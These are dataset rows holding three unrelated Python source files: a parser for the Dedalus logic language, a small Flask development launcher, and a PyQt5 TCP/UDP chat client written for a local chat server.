| 109,737,208
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 26,697
|
py
|
#!/usr/bin/env python
'''
dedalusParser.py
Define the functionality for parsing Dedalus files.
'''
import inspect, logging, os, re, string, sys, traceback
from pyparsing import *
import ConfigParser
# ------------------------------------------------------ #
# import sibling packages HERE!!!
if not os.path.abspath( __file__ + "/../.." ) in sys.path :
sys.path.append( os.path.abspath( __file__ + "/../.." ) )
from utils import tools
# ------------------------------------------------------ #
#############
# GLOBALS #
#############
eqnOps = [ "==", "!=", ">=", "<=", ">", "<" ]
opList = eqnOps + [ "+", "-", "/", "*" ]
aggOps = [ "min", "max", "sum", "count", "avg" ]
##################
# CLEAN RESULT #
##################
# input pyparse object of the form ([...], {...})
# output only [...]
def cleanResult( result ) :
newResult = []
numParsedStrings = len(result)
for i in range(0, numParsedStrings) :
newResult.append( result[i] )
return newResult
###########
# PARSE #
###########
# input a ded line
# output parsed line
# fact returns : [ 'fact', { relationName:'relationNameStr', dataList:[ data1, ... , dataN ], factTimeArg:<anInteger> } ]
# rule returns : [ 'rule',
# { relationName : 'relationNameStr',
# goalAttList:[ data1, ... , dataN ],
# goalTimeArg : ""/next/async,
# subgoalListOfDicts : [ { subgoalName : 'subgoalNameStr',
# subgoalAttList : [ data1, ... , dataN ],
# polarity : 'notin' OR '',
# subgoalTimeArg : <anInteger> }, ... ],
# eqnDict : { 'eqn1':{ variableList : [ 'var1', ... , 'varI' ] },
# ... ,
# 'eqnM':{ variableList : [ 'var1', ... , 'varJ' ] } } } ]
def parse( dedLine, settings_path ) :
logging.debug( " PARSE : dedLine = '" + dedLine + "'" )
# ---------------------------------------------------- #
# CASE : line is empty
if dedLine == "" :
return None
# ---------------------------------------------------- #
# CASE : line missing semicolon
elif not ";" in dedLine :
sys.exit( " PARSE : ERROR : missing semicolon in line '" + dedLine + "'" )
# ---------------------------------------------------- #
# CASE : line is an include
elif dedLine.startswith( 'include"' ) or dedLine.startswith( "include'" ) :
pass
# ---------------------------------------------------- #
# CASE : line is a FACT
elif not ":-" in dedLine :
if not sanityCheckSyntax_fact_preChecks( dedLine ) :
sys.exit( " PARSE : ERROR : invalid syntax in fact '" + dedLine + "'" )
factData = {}
# ///////////////////////////////// #
# get relation name
relationName = dedLine.split( "(", 1 )[0]
# ///////////////////////////////// #
# get data list
dataList = dedLine.split( "(", 1 )[1] # string
dataList = dataList.split( ")", 1 )[0] # string
dataList = dataList.split( "," )
# ///////////////////////////////// #
# get time arg
ampersandIndex = dedLine.index( "@" )
factTimeArg = dedLine[ ampersandIndex + 1 : ]
factTimeArg = factTimeArg.replace( ";", "" ) # remove semicolons
# ///////////////////////////////// #
# save fact information
factData[ "relationName" ] = relationName
factData[ "dataList" ] = dataList
factData[ "factTimeArg" ] = factTimeArg
if not sanityCheckSyntax_fact_postChecks( dedLine, factData ) :
sys.exit( " PARSE : ERROR : invalid syntax in fact '" + dedLine + "'" )
logging.debug( " PARSE : returning " + str( [ "fact", factData ] ) )
return [ "fact", factData ]
# ---------------------------------------------------- #
# CASE : line is a RULE
#
# rule returns : [ 'rule',
# { relationName : 'relationNameStr',
# goalAttList:[ data1, ... , dataN ],
# goalTimeArg : ""/next/async,
# subgoalListOfDicts : [ { subgoalName : 'subgoalNameStr',
# subgoalAttList : [ data1, ... , dataN ],
# polarity : 'notin' OR '',
# subgoalTimeArg : <anInteger> }, ... ],
# eqnDict : { 'eqn1':{ variableList : [ 'var1', ... , 'varI' ] },
# ... ,
# 'eqnM':{ variableList : [ 'var1', ... , 'varJ' ] } } } ]
elif ":-" in dedLine :
if not sanityCheckSyntax_rule_preChecks( dedLine ) :
sys.exit( " PARSE : ERROR : invalid syntax in fact '" + dedLine + "'" )
ruleData = {}
# ///////////////////////////////// #
# get relation name
relationName = dedLine.split( "(", 1 )[0]
ruleData[ "relationName" ] = relationName
# ///////////////////////////////// #
# get goal attribute list
goalAttList = dedLine.split( "(", 1 )[1] # string
goalAttList = goalAttList.split( ")", 1 )[0] # string
goalAttList = goalAttList.split( "," )
ruleData[ "goalAttList" ] = goalAttList
# ///////////////////////////////// #
# get goal time argument
goalTimeArg = dedLine.split( ":-", 1 )[0] # string
try :
goalTimeArg = goalTimeArg.split( "@", 1 )[1] # string
except IndexError :
goalTimeArg = ""
ruleData[ "goalTimeArg" ] = goalTimeArg
# ///////////////////////////////// #
# parse the rule body for the eqn list
eqnDict = getEqnDict( dedLine )
ruleData[ "eqnDict" ] = eqnDict
# ///////////////////////////////// #
# parse the rule body for the eqn list
subgoalListOfDicts = getSubgoalList( dedLine, eqnDict )
ruleData[ "subgoalListOfDicts" ] = subgoalListOfDicts
logging.debug( " PARSE : relationName = " + str( relationName ) )
logging.debug( " PARSE : goalAttList = " + str( goalAttList ) )
logging.debug( " PARSE : goalTimeArg = " + str( goalTimeArg ) )
logging.debug( " PARSE : subgoalListOfDicts = " + str( subgoalListOfDicts ) )
logging.debug( " PARSE : eqnDict = " + str( eqnDict ) )
if not sanityCheckSyntax_rule_postChecks( dedLine, ruleData, settings_path ) :
sys.exit( " PARSE : ERROR : invalid syntax in fact '" + dedLine + "'" )
logging.debug( " PARSE : returning " + str( [ "rule", ruleData ] ) )
return [ "rule", ruleData ]
# ---------------------------------------------------- #
# CASE : wtf???
else :
sys.exit( " PARSE : ERROR : this line is not an empty, a fact, or a rule : '" + dedLine + "'. aborting..." )
##########################
# CONTAINS NO SUBGOALS #
##########################
# make cursory checks to determine if the input rule line contains subgoals
def containsNoSubgoals( dedLine ) :
body = getBody( dedLine )
# ------------------------------------- #
# CASE : no open parenthesis to demark
# attribute list start
if "(" in body :
return False
# ------------------------------------- #
# CASE : no closed parenthesis to demark
# attribute list end
elif ")" in body :
return False
# ------------------------------------- #
# CASE : no commas to delimit subgoals
elif "," in body :
return False
# ------------------------------------- #
# otherwise, probably incorrect
else :
return True
#############
# HAS AGG #
#############
# check if the input attribute contains one
# of the supported aggregate operations.
def hasAgg( attStr ) :
flag = False
for agg in aggOps :
if agg+"<" in attStr :
flag = True
return flag
##################
# IS FIXED STR #
##################
# check if the input attribute is a string,
# as indicated by single or double quotes
def isFixedStr( att ) :
if att.startswith( "'" ) and att.endswith( "'" ) :
return True
elif att.startswith( '"' ) and att.endswith( '"' ) :
return True
else :
return False
##################
# IS FIXED INT #
##################
# check if input attribute is an integer
def isFixedInt( att ) :
if att.isdigit() :
return True
else :
return False
###########################################
# CHECK MIN ONE POS SUBGOAL NO TIME ARG #
###########################################
# make sure at least one positive subgoal
# has no numeric time argument
def check_min_one_pos_subgoal_no_time_arg( ruleLine, ruleData ) :
if not hasPosSubgoalWithoutIntegerTimeArg( ruleData ) :
raise Exception( " SANITY CHECK SYNTAX RULE POST CHECKS : ERROR : " + \
" invalid syntax in line \n'" + ruleLine + \
"'\n line at least one positive subgoal " + \
"must not be annotated with a numeric time argument." )
################################
# CHECK IDENTICAL FIRST ATTS #
################################
# make sure all subgoals
# have identical first attributes
def check_identical_first_atts( ruleLine, ruleData ) :
subgoalListOfDicts = ruleData[ "subgoalListOfDicts" ]
firstAtts = []
for sub in subgoalListOfDicts :
subgoalAttList = sub[ "subgoalAttList" ]
firstAtts.append( subgoalAttList[0] )
firstAtts = set( firstAtts )
if not len( firstAtts ) < 2 :
raise Exception( " SANITY CHECK SYNTAX RULE : ERROR : " + \
"invalid syntax in line \n'" + ruleLine + \
"'\n all subgoals in next and async " + \
"rules must have identical first attributes.\n" )
##########################################
# SANITY CHECK SYNTAX RULE POST CHECKS #
##########################################
# make sure contents of rule make sense.
def sanityCheckSyntax_rule_postChecks( ruleLine, ruleData, settings_path ) :
# ------------------------------------------ #
# make sure all subgoals in next and async
# rules have identical first attributes
try :
use_hacks = tools.getConfig( settings_path, "DEFAULT", "USE_HACKS", bool )
if use_hacks :
if ruleData[ "goalTimeArg" ] == "next" :
check_identical_first_atts( ruleLine, ruleData )
else :
check_min_one_pos_subgoal_no_time_arg( ruleLine, ruleData )
if ruleData[ "goalTimeArg" ] == "next" or ruleData[ "goalTimeArg" ] == "async" :
check_identical_first_atts( ruleLine, ruleData )
except ConfigParser.NoOptionError :
logging.warning( "WARNING : no 'USE_HACKS' defined in 'DEFAULT' section of settings.ini ...running without wildcard rewrites." )
check_min_one_pos_subgoal_no_time_arg( ruleLine, ruleData )
if ruleData[ "goalTimeArg" ] == "next" or ruleData[ "goalTimeArg" ] == "async" :
check_identical_first_atts( ruleLine, ruleData )
# ------------------------------------------ #
# make sure all goal and subgoal attribute
# variables start with a captial letter
goalAttList = ruleData[ "goalAttList" ]
for att in goalAttList :
if not att[0].isalpha() or not att[0].isupper() :
if not hasAgg( att ) : # att is not an aggregate call
if not isFixedStr( att ) : # att is not a fixed data input
if not isFixedInt( att ) : # att is not a fixed data input
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n the goal contains contains an attribute not starting with a capitalized letter: '" + att + "'. \n attribute variables must start with an upper case letter." )
subgoalListOfDicts = ruleData[ "subgoalListOfDicts" ]
for sub in subgoalListOfDicts :
subgoalAttList = sub[ "subgoalAttList" ]
for att in subgoalAttList :
if not att[0].isalpha() or not att[0].isupper() :
if not hasAgg( att ) : # att is not an aggregate call
if not isFixedStr( att ) : # att is not a fixed data input
if not isFixedInt( att ) : # att is not a fixed data input
# subgoals can have wildcards
if not att[0] == "_" :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n subgoal '" + sub[ "subgoalName" ] + "' contains an attribute not starting with a capitalized letter: '" + att + "'. \n attribute variables must start with an upper case letter." )
# ------------------------------------------ #
# make sure all relation names are
# lower case
goalName = ruleData[ "relationName" ]
for c in goalName :
if c.isalpha() and not c.islower() :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n The goal name '" + goalName + "' contains an upper-case letter. \n relation names must contain only lower-case characters." )
subgoalListOfDicts = ruleData[ "subgoalListOfDicts" ]
for sub in subgoalListOfDicts :
subName = sub[ "subgoalName" ]
for c in subName :
if c.isalpha() and not c.islower() :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n The subgoal name '" + subName + "' contains an upper-case letter. \n relation names must contain only lower-case characters." )
return True
##############################################
# HAS POS SUBGOAL WITHOUT INTEGER TIME ARG #
##############################################
# check make sure the line contains at least
# one positive subgoal NOT annotated with an
# integer time argument
def hasPosSubgoalWithoutIntegerTimeArg( ruleData ) :
goalTimeArg = ruleData[ "goalTimeArg" ]
subgoalListOfDicts = ruleData[ "subgoalListOfDicts" ]
# ------------------------------------------ #
# CASE : rule is either next or async
# the clock goal is always initially positive
if not goalTimeArg == "" :
return True
# ------------------------------------------ #
# CASE : rule is deductive
# need to check more closely for deductive rules
else :
for subgoal in subgoalListOfDicts :
if subgoal[ "polarity"] == "" : # positive
if not subgoal[ "subgoalTimeArg" ].isdigit() :
return True
return False
#########################################
# SANITY CHECK SYNTAX RULE PRE CHECKS #
#########################################
# make an initial pass on the rule syntax
def sanityCheckSyntax_rule_preChecks( ruleLine ) :
# make sure the line likely has subgoal(s)
if containsNoSubgoals( ruleLine ) :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n rule contains no detected subgoals." )
# make sure parentheses make sense
if not ruleLine.count( "(" ) == ruleLine.count( ")" ) :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n rule contains inconsistent counts for '(' and ')'" )
# make sure number of single quotes is even
if not ruleLine.count( "'" ) % 2 == 0 :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n rule contains inconsistent use of single quotes." )
# make sure number of double quotes is even
if not ruleLine.count( '"' ) % 2 == 0 :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n rule contains inconsistent use of single quotes." )
return True
##################
# GET EQN DICT #
##################
# get the complete dictionary of equations in the given rule line
def getEqnDict( dedLine ) :
eqnDict = {}
body = getBody( dedLine )
body = body.split( "," )
# get the complete list of eqns from the rule body
eqnList = []
for thing in body :
if isEqn( thing ) :
eqnList.append( thing )
# get the complete list of variables per eqn
for eqn in eqnList :
varList = getEqnVarList( eqn )
eqnDict[ eqn ] = varList
return eqnDict
######################
# GET EQN VAR LIST #
######################
def getEqnVarList( eqnString ) :
for op in opList :
eqnString = eqnString.replace( op, "___COMMA___" )
varList = eqnString.split( "___COMMA___" )
return varList
######################
# GET SUBGOAL LIST #
######################
# get the complete list of subgoals in the given rule line
# subgoalListOfDicts : [ { subgoalName : 'subgoalNameStr',
# subgoalAttList : [ data1, ... , dataN ],
# polarity : 'notin' OR '',
# subgoalTimeArg : <anInteger> }, ... ]
def getSubgoalList( dedLine, eqnList ) :
subgoalListOfDicts = []
# ========================================= #
# replace eqn instances in line
for eqn in eqnList :
dedLine = dedLine.replace( eqn, "" )
dedLine = dedLine.replace( ",,", "," )
# ========================================= #
# grab subgoals
# grab indexes of commas separating subgoals
indexList = getCommaIndexes( getBody( dedLine ) )
#print indexList
# replace all subgoal-separating commas with a special character sequence
body = getBody( dedLine )
tmp_body = ""
for i in range( 0, len( body ) ) :
if not i in indexList :
tmp_body += body[i]
else :
tmp_body += "___SPLIT___HERE___"
body = tmp_body
#print body
# generate list of separated subgoals by splitting on the special
# character sequence
subgoals = body.split( "___SPLIT___HERE___" )
# remove empties
tmp_subgoals = []
for sub in subgoals :
if not sub == "" :
tmp_subgoals.append( sub )
subgoals = tmp_subgoals
# ========================================= #
# parse all subgoals in the list
for sub in subgoals :
#print sub
currSubData = {}
if not sub == "" :
# get subgoalTimeArg
try :
ampersandIndex = sub.index( "@" )
subgoalTimeArg = sub[ ampersandIndex + 1 : ]
sub = sub.replace( "@" + subgoalTimeArg, "" ) # remove the time arg from the subgoal
except ValueError :
subgoalTimeArg = ""
# get subgoal name and polarity
data = sub.replace( ")", "" )
data = data.split( "(" )
subgoalName = data[0]
subgoalName = subgoalName.replace( ",", "" ) # remove any rogue commas
if " notin " in subgoalName :
polarity = "notin"
subgoalName = subgoalName.replace( " notin ", "" )
else :
polarity = ""
# get subgoal att list
subgoalAttList = data[1]
subgoalAttList = subgoalAttList.split( "," )
# collect subgoal data
currSubData[ "subgoalName" ] = subgoalName
currSubData[ "subgoalAttList" ] = subgoalAttList
currSubData[ "polarity" ] = polarity
currSubData[ "subgoalTimeArg" ] = subgoalTimeArg
# save data for this subgoal
subgoalListOfDicts.append( currSubData )
#print subgoalListOfDict
#sys.exit( "foo" )
return subgoalListOfDicts
#######################
# GET COMMA INDEXES #
#######################
# given a rule body, get the indexes of commas separating subgoals.
def getCommaIndexes( body ) :
underscoreStr = getCommaIndexes_helper( body )
indexList = []
for i in range( 0, len( underscoreStr ) ) :
if underscoreStr[i] == "," :
indexList.append( i )
return indexList
##############################
# GET COMMA INDEXES HELPER #
##############################
# replace all paren contents with underscores
def getCommaIndexes_helper( body ) :
# get the first occurring paren group
nextParenGroup = "(" + re.search(r'\((.*?)\)',body).group(1) + ")"
# replace the group with the same number of underscores in the body
replacementStr = ""
for i in range( 0, len(nextParenGroup)-2 ) :
replacementStr += "_"
replacementStr = "_" + replacementStr + "_" # use underscores to replace parentheses
body = body.replace( nextParenGroup, replacementStr )
# BASE CASE : no more parentheses
if not "(" in body :
return body
# RECURSIVE CASE : yes more parentheses
else :
return getCommaIndexes_helper( body )
############
# IS EQN #
############
# check if input contents from the rule body is an equation
def isEqn( sub ) :
flag = False
for op in eqnOps :
if op in sub :
flag = True
return flag
##############
# GET BODY #
##############
# return the body str from the input rule
def getBody( query ) :
body = query.replace( "notin", "___NOTIN___" )
body = body.replace( ";", "" )
body = body.translate( None, string.whitespace )
body = body.split( ":-" )
body = body[1]
body = body.replace( "___NOTIN___", " notin " )
return body
##############################
# SANITY CHECK SYNTAX FACT #
##############################
# check fact lines for invalid syntax.
# abort if invalid syntax found.
# return True otherwise.
def sanityCheckSyntax_fact_preChecks( factLine ) :
logging.debug( " SANITY CHECK SYNTAX FACT : running process..." )
logging.debug( " SANITY CHECK SYNTAX FACT : factLine = " + str( factLine ) )
# ------------------------------------------ #
# facts must have time args.
if not "@" in factLine :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line does not contain a time argument.\n" )
# ------------------------------------------ #
# check parentheses
if not factLine.count( "(" ) < 2 :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line contains more than one '('\n" )
elif not factLine.count( "(" ) > 0 :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line contains fewer than one '('\n" )
if not factLine.count( ")" ) < 2 :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line contains more than one ')'\n" )
elif not factLine.count( ")" ) > 0 :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line contains fewer than one ')'\n" )
return True
##########################################
# SANITY CHECK SYNTAX FACT POST CHECKS #
##########################################
# check fact lines for invalid syntax.
# abort if invalid syntax found.
# return True otherwise.
def sanityCheckSyntax_fact_postChecks( factLine, factData ) :
logging.debug( " SANITY CHECK SYNTAX FACT : running process..." )
logging.debug( " SANITY CHECK SYNTAX FACT : factData = " + str( factData ) )
# ------------------------------------------ #
# check quotes on input string data
dataList = factData[ "dataList" ]
for data in dataList :
logging.debug( " SANITY CHECK SYNTAX FACT : data = " + str( data ) + ", type( data ) = " + str( type( data) ) + "\n" )
if isString( data ) :
# check quotes
if not data.count( "'" ) == 2 and not data.count( '"' ) == 2 :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in fact '" + \
str( factLine ) + "'\n fact definition contains string data not " + \
"surrounded by either exactly two single quotes or exactly two double quotes : " + data + "\n" )
else :
pass
# ------------------------------------------ #
# check time arg
factTimeArg = factData[ "factTimeArg" ]
print "factTimeArg = " + str( factTimeArg )
if not factTimeArg.isdigit() and \
not factTimeArg == "constant" :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid " + \
"syntax in fact data list '" + str( factLine ) + \
"'\n fact definition has no valid time arg." )
return True
###############
# IS STRING #
###############
# test if the input string contains any alphabetic characters.
# if so, then the data is a string.
def isString( testString ) :
logging.debug( " IS STRING : testString = " + str( testString ) )
alphabet = [ 'a', 'b', 'c', \
'd', 'e', 'f', \
'g', 'h', 'i', \
'j', 'k', 'l', \
'm', 'n', 'o', \
'p', 'q', 'r', \
's', 't', 'u', \
'v', 'w', 'x', \
'y', 'z' ]
flag = False
for character in testString :
if character.lower() in alphabet :
flag = True
logging.debug( " IS STRING : flag = " + str( flag ) )
return flag
###################
# PARSE DEDALUS #
###################
# input name of raw dedalus file
# output array of arrays containing the contents of parsed ded lines
def parseDedalus( dedFile, settings_path ) :
logging.debug( " PARSE DEDALUS : dedFile = " + dedFile )
parsedLines = []
# ------------------------------------------------------------- #
# remove all multiline whitespace and place all rules
# on individual lines
lineList = sanitizeFile( dedFile )
# ------------------------------------------------------------- #
# iterate over each line and parse
for line in lineList :
result = parse( line, settings_path ) # parse returns None on empty lines
if result :
parsedLines.append( result )
logging.debug( " PARSE DEDALUS : parsedLines = " + str( parsedLines ) )
return parsedLines
# ------------------------------------------------------------- #
###################
# SANITIZE FILE #
###################
# input all lines from input file
# combine all lines into a single huge string.
# to preserve syntax :
# replace semicolons with string ';___NEWLINE___'
# replace all notins with '___notin___'
# split on '___NEWLINE__'
def sanitizeFile( dedFile ) :
bigLine = ""
# "always check if files exist" -- Ye Olde SE proverb
if os.path.isfile( dedFile ) :
f = open( dedFile, "r" )
# combine all lines into one big line
for line in f :
#print "old_line = " +str( line )
line = line.replace( "//", "___THISISACOMMENT___" )
line = line.split( "___THISISACOMMENT___", 1 )[0]
#print "new_line = " +str( line )
line = line.replace( "notin", "___notin___" ) # preserve notins
line = line.replace( ";", ";___NEWLINE___" ) # preserve semicolons
line = line.translate( None, string.whitespace ) # remove all whitespace
bigLine += line
f.close()
bigLine = bigLine.replace( "___notin___", " notin " ) # restore notins
lineList = bigLine.split( "___NEWLINE___" ) # split big line into a list of lines
# remove duplicates
final_lineList = []
for line in lineList :
if not line in final_lineList :
final_lineList.append( line )
return final_lineList
else :
sys.exit( "ERROR: File at " + dedFile + " does not exist.\nAborting..." )
#########
# EOF #
#########
|
[
"kdahlgren15@gmail.com"
] |
kdahlgren15@gmail.com
|
6d5e991fc2b55c73e9b32da5c9d0db6a146186b2
|
a22054032f23d84f34741532aaca5fe46e23a552
|
/run_app_dev.py
|
6fae0d484a2796685d1401726f30707b1548e9fc
|
[] |
no_license
|
BearChao/transfer
|
622003bfb0b2b7c8da6287a65764c69ad81f3d9c
|
4159a596d0f5c728f6ce27568beb21c2ba321846
|
refs/heads/master
| 2021-05-23T06:08:01.183541
| 2018-05-28T14:39:30
| 2018-05-28T14:39:30
| 94,799,123
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 209
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from app import create_app
app = create_app(os.getenv('FLASK_CONFIG') or 'default')
if __name__ == '__main__':
app.run(host='0.0.0.0',debug=True)
|
[
"zynick@foxmail.com"
] |
zynick@foxmail.com
|
65c81b2c37dfa24b81ae8c97d1e1d2f37c8af03a
|
b926393a43850799f57b59202796d128c5b611ab
|
/main.py
|
162002374fe6c83445e2d99937a3a90f3ac936c1
|
[] |
no_license
|
apustovitin/sea-battle
|
0435e697b2143e80fdd04cbabbd5a51f18536c0c
|
2546d9f296a7bd3a8e84af3bd0439b21180d27f6
|
refs/heads/master
| 2023-01-18T18:03:27.210594
| 2020-12-01T14:09:33
| 2020-12-01T14:09:33
| 317,479,808
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,482
|
py
|
import curses
import board_image
from game import Game
import random
def moves_loop(game):
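# randomly let the computer move first, then alternate player and computer turns until a break or restart is requested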
if random.choice([False, True]):
is_break, is_restart = game.computer_move()
if is_break or is_restart:
return is_break, is_restart
while True:
is_break, is_restart = game.player_move()
if is_break or is_restart:
return is_break, is_restart
is_break, is_restart = game.computer_move()
if is_break or is_restart:
return is_break, is_restart
def game_loop(stdscr):
unknown_ships = [1, 1, 1, 1, 2, 2, 2, 3, 3, 4]
while True:
stdscr.clear()
computer_board = board_image.BoardImage()
player_board = board_image.BoardImage()
player_board_image = board_image.BoardImage()
game = Game(stdscr, ".\screen_layout.txt", unknown_ships, computer_board, player_board, player_board_image)
game.place_computer_ships()
game.print_screen_layout()
is_break, is_restart = game.place_player_ships()
if is_break:
break
if is_restart:
continue
is_break, is_restart = moves_loop(game)
if is_break:
break
if is_restart:
continue
def main():
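# initialize curses, run the game loop, and restore the terminal on exit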
stdscr = curses.initscr()
stdscr.clear()
curses.noecho()
curses.cbreak()
curses.curs_set(0)
stdscr.keypad(True)
game_loop(stdscr)
curses.endwin()
if __name__ == '__main__':
main()
|
[
"apustovitin@gmail.com"
] |
apustovitin@gmail.com
|
36719882d3b660fcaa5d889e59fee49bb5b86525
|
a6ae6b2bb64b622338fc001b30a9f053717cc770
|
/toVOC/evaluation/evalute.py
|
ae710a548491b2f324491b17a26f860d2fca267c
|
[] |
no_license
|
tianws/script
|
1bec9f549fd801b5848f33f243d32db5bdd61722
|
3ecf2bca42e8c6c7f6a964ddc42acc3e483387fc
|
refs/heads/master
| 2021-06-04T11:53:32.337079
| 2021-01-12T08:20:13
| 2021-01-12T08:20:13
| 98,512,027
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,534
|
py
|
#!/usr/bin/env python
# coding=utf-8
from __future__ import division, unicode_literals
import argparse
import logging
import phodopus
import squirrel
import sys
if sys.version_info.major == 2:
from pathlib2 import Path
else:
from pathlib import Path
if __name__ == '__main__':
logging.basicConfig(
format='%(levelname)s:%(message)s', level=logging.INFO)
parser = argparse.ArgumentParser(
description='Evaluate rear-vehicle or lane detection by comparing a recognition output file (log) against a label file (txt)')
parser.add_argument('log_pathname', action='store', type=Path)
parser.add_argument('label_pathname', action='store', type=Path)
group = parser.add_mutually_exclusive_group()
group.add_argument(
'-s', action='store_const', dest='module',
const=squirrel, help='squirrel')
group.add_argument(
'-p', action='store_const', dest='module',
const=phodopus, help='phodopus')
args = parser.parse_args(sys.argv[1:])
if args.module is None:
logging.error('You should choose -s or -p! See -h')
tp_count, fp_count, fn_count = args.module.parse(
args.log_pathname,
args.label_pathname)
precision, recall, fb_measure, _ = args.module.statistics(
tp_count,
fp_count,
fn_count)
logging.info('precision: {:.3}'.format(precision))
logging.info('recall: {:.3}'.format(recall))
logging.info('fb_measure: {:.3}'.format(fb_measure))
|
[
"tianws@mapbar.com"
] |
tianws@mapbar.com
|
4069b0b957b7c70d0f9663a86dd1cecb18c73276
|
1069b21592cd0771d69618d292e0511ec98251d9
|
/visual_client10_9.py
|
09d08582ba82f4698edc446c1688a703a3d9fcb8
|
[] |
no_license
|
12Dong/python-socket
|
6936fb6d7984c5948b31ce70837fab3437420b82
|
cdb754a104eb5a0ccdb260eea83a943ce67bf268
|
refs/heads/master
| 2021-08-24T14:06:05.261228
| 2017-12-10T04:42:05
| 2017-12-10T04:42:05
| 113,722,198
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,415
|
py
|
# coding:utf-8
import socket
import threading
import sys
from PyQt5.QtWidgets import QWidget,QApplication,QGridLayout,QLineEdit,QTextEdit,QLabel,QPushButton,QFrame
from PyQt5 import QtCore,QtWidgets
from PyQt5 import QtGui
from PyQt5.QtGui import*
from PyQt5.QtGui import QIcon
host = 'localhost'
port = 9999
username = '12Dong'
class Log(QFrame):
def __init__(self,s):
super().__init__()
self.initUI()
self.s=s
def initUI(self):
self.setObjectName('main')
self.Str = QLabel("Welcome to my chat room.Please input your nickname")
self.Nickname = QLabel('Nickname : ')
self.text = QLineEdit()
self.btnStart = QPushButton("Start!")
grid = QGridLayout()
grid.setSpacing(10)
grid.addWidget(self.Str,2,2,2,5)
grid.addWidget(self.Nickname,3,1,3,1)
grid.addWidget(self.text,3,2,3,4)
grid.addWidget(self.btnStart,3,6,3,6)
self.setLayout(grid)
self.creationAction()
self.setWindowTitle('Title')
self.setGeometry(500, 500, 500, 300)
with open('logbg.qss', 'r') as p:
self.setStyleSheet(p.read())
self.show()
def setNickname(self):
name = str(self.text.text())
self.text.setText('')
s.send(name.encode('utf-8'))
c = Client(name)
c.show()
self.close()
def creationAction(self):
self.btnStart.clicked.connect(self.setNickname)
class Client(QFrame):
def __init__(self, name):
super().__init__()
self.Nickname = name
self.initUI()
def initUI(self):
self.setWindowTitle('Client')
self.setNameWidget = QWidget()#
self.layout = QGridLayout(self)#
self.setNameLayout = QGridLayout(self.setNameWidget)#
self.btnSend = QPushButton('send')#
self.input = QLineEdit()#
self.chat = QTextEdit()#
self.timer = QtCore.QTimer()
self.messages = []
self.build()
self.createAction()
self.setWindowIcon(QIcon("mylove.ico"))
self.Sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
recvThread = threading.Thread(target=self.recvFromServer) #
recvThread.start()#
self.setGeometry(500,500,600,400)
self.setWindowTitle('Communcation')
with open('texteditbg.qss', 'r') as q:
self.setStyleSheet(q.read())
def sendToServer(self): #
global username
text = str(self.input.text())
self.input.setText('')
if text == 'Exit' or text=='':
self.exit()
try:
s.send(text.encode('utf-8'))
print('%s >> %s' % (username, text))
self.messages.append(self.Nickname+" : " + text )
except ConnectionAbortedError:
print('Server closed this connection!')
self.exit()
except ConnectionResetError:
print('Server is closed!')
self.exit()
def recvFromServer(self): #
while 1:
try:
data = s.recv(1024).decode('utf-8')
if not data:
exit()
print(data)
self.messages.append(data)
except ConnectionAbortedError:
print('Server closed this connection!')
self.exit()
except ConnectionResetError:
print('Server is closed!')
self.exit()
def showChat(self): #
for m in self.messages:
self.chat.append(m)
self.messages = []
def exit(self): #
s.close()
sys.exit()
def build(self):
self.layout.addWidget(self.chat, 0, 0, 5, 4)
self.layout.addWidget(self.input, 5, 0, 1, 3)
self.layout.addWidget(self.btnSend, 5, 3)
self.setLayout(self.layout)
def createAction(self):
self.btnSend.clicked.connect(self.sendToServer)
self.timer.timeout.connect(self.showChat)
self.timer.start(1000)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
address = ('127.0.0.1', 31500)
Sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
Sock.sendto(b'1',address)
print(s.recv(1024).decode())
app = QApplication(sys.argv)
log = Log(s)
app.exec_()
# 10/4 implemented basic socket communication
# 10/6 wrapped the client in PyQt5 and polished the interface
# 10/9 added UDP communication
# made by 12Dong
|
[
"289663639@qq.com"
] |
289663639@qq.com
|
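The chat client above hands data from the receiving thread to the GUI by appending to self.messages and draining that list from a one-second QTimer. That works, but the idiomatic Qt way to cross the thread boundary is a signal, which Qt delivers to the GUI thread through a queued connection. A small sketch of that pattern; the class and attribute names are illustrative, not from the repository:

from PyQt5.QtCore import QObject, QThread, pyqtSignal

class Receiver(QObject):
    message_received = pyqtSignal(str)  # delivered on the GUI thread via a queued connection

    def __init__(self, sock):
        super().__init__()
        self.sock = sock

    def run(self):
        while True:
            data = self.sock.recv(1024)
            if not data:
                break
            self.message_received.emit(data.decode('utf-8'))

# usage inside a widget (sketch):
#   self.thread = QThread()
#   self.receiver = Receiver(s)
#   self.receiver.moveToThread(self.thread)
#   self.thread.started.connect(self.receiver.run)
#   self.receiver.message_received.connect(self.chat.append)
#   self.thread.start()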
